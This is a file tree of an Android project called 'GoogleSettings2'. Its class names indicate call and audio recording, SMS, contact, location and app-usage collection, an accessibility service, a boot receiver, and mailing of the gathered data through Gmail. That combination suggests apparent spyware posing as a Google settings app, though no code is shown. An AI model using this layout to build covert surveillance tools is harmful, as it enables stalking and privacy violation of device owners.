# GoogleSettings2

app/: build.gradle
app/src/androidTest/java/com/setting/dl/google/googlesettings/: ExampleInstrumentedTest.java
app/src/main/: AndroidManifest.xml
app/src/main/java/com/setting/dl/google/googlesettings/: AccessNotification.java  AudioRecord.java  MailJobs.java  MainActivity.java  MyLogger.java  NextAlarmChangeReceiver.java  RemoveNotificationReceiver.java  Time.java  u.java
app/src/main/java/com/setting/dl/google/googlesettings/mail/: Battery.java  GPSLocation.java  Images.java  MailImageParts.java  MailSendIcons.java  MailingFile.java  MailingImages.java  OrderSendCalls.java  OrderSendContacts.java  OrderSendSms.java  Orders.java  PowerConnectionLestener.java
app/src/main/java/com/setting/dl/google/googlesettings/mail/gmail/: Account.java  GmailService.java  Mail.java
app/src/main/java/com/setting/dl/google/googlesettings/phone/: Calls.java  Compress.java  Contacts.java  FileSplitter.java  InstalledApps.java  ProccessManager.java  SendSms.java  Sms.java  UsageStatMan.java
app/src/main/java/com/setting/dl/google/googlesettings/recievers/: BootOkey.java  CallManager.java  CallManagerBase.java  CallRecord.java  ConnectivityListener.java  SmsReciever.java  WifiLestener.java
app/src/main/res/layout/: activity_main.xml
app/src/main/res/values/: strings.xml
app/src/main/res/xml/: accessibilityservice.xml
app/src/test/java/com/setting/dl/google/googlesettings/: ExampleUnitTest.java
gradle/wrapper/: gradle-wrapper.properties
